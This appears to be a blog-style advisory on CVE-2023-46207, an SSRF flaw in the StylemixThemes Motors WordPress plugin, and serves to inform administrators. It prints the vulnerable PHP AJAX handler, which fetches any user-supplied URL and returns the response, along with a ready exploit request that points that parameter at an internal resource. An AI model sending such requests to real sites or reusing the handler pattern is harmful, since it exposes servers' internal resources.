CVE-2023-46207: Server-Side Request Forgery (SSRF) vulnerability in StylemixThemes Motors – Car Dealer, Classifieds & Listing

Recently, a significant security vulnerability was discovered in the StylemixThemes Motors – Car Dealer, Classifieds & Listing plugin, which is extensively used for creating car dealership and classifieds websites with WordPress. This vulnerability, identified as CVE-2023-46207, is a Server-Side Request Forgery (SSRF) vulnerability that affects all plugin versions from n/a through 1.4.6.

In this detailed post, we will be taking a look at the exploit from a technical standpoint, complete with code snippets, and links to original references. By understanding how this vulnerability works, web administrators and developers can better protect their websites against similar weaknesses.

Description

Server-Side Request Forgery (SSRF) is a type of security vulnerability where an attacker can abuse the functionality of a vulnerable server to send requests to other internal or external resources, potentially leading to unauthorized access and information leakage.

In the case of StylemixThemes Motors – Car Dealer, Classifieds & Listing, the SSRF vulnerability allows an attacker to send crafted requests to the vulnerable server and target internal resources as well as external third-party resources. This exposes sensitive information and even provides an entry point for more severe attacks like SQL injection or Remote Code Execution (RCE).

Code Snippet

The vulnerability stems from the stm_motors_ajax_add_car_popup_action function in the stm_vehicles_listing/includes/ajax-actions.php file. An attacker can exploit this function by sending a crafted POST request with the 'site_url' parameter set to an internal or external resource.

function stm_motors_ajax_add_car_popup_action()
{
    check_ajax_referer('stm_ajax_nonce', 'nonce');

    $site_url = (!empty($_POST['site_url'])) ? sanitize_text_field($_POST['site_url']) : '';

    if (!empty($site_url)) {
        $response = wp_remote_get($site_url);
        wp_send_json(array('success' => 'true', 'message' => wp_remote_retrieve_body($response)));
    } else {
        wp_send_json(array('success' => 'false', 'message' => esc_html__('Error: Please specify a site URL', 'stm_vehicles_listing')));
    }

    exit;
}

Exploit Details

1. Craft a POST request to the vulnerable server's wp-admin/admin-ajax.php endpoint with the following parameters:

nonce: a valid nonce value,

site_url: the target URL/resource.

For example

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vulnerable-website.example
Content-Type: application/x-www-form-urlencoded
Content-Length: [length]

action=stm_motors_ajax_add_car_popup&nonce=[VALID_NONCE]&site_url=http://internal-resource.local

2. Upon receiving the request, the vulnerable server will fetch the contents of the specified 'site_url' and return it in the response, potentially exposing sensitive information or causing further damage.

Here are some notable references regarding this vulnerability

1. CVE-2023-46207 at NVD
2. Official StylemixThemes Motors – Car Dealer, Classifieds & Listing Plugin Homepage

Conclusion

The discovered SSRF vulnerability in the StylemixThemes Motors – Car Dealer, Classifieds & Listing plugin (CVE-2023-46207) is a crucial security issue that affects all plugin versions from n/a through 1.4.6. As a web administrator or developer working with this plugin, it is crucial to keep your plugins up to date and ensure that they don't expose any vulnerabilities like this SSRF issue that can jeopardize your website's security.

To further protect your websites from potential attacks, always follow best security practices, regularly update your plugins and themes, and monitor your site for any suspicious activities.

Timeline

Published on: 11/13/2023 03:15:09 UTC
Last modified on: 11/16/2023 23:47:25 UTC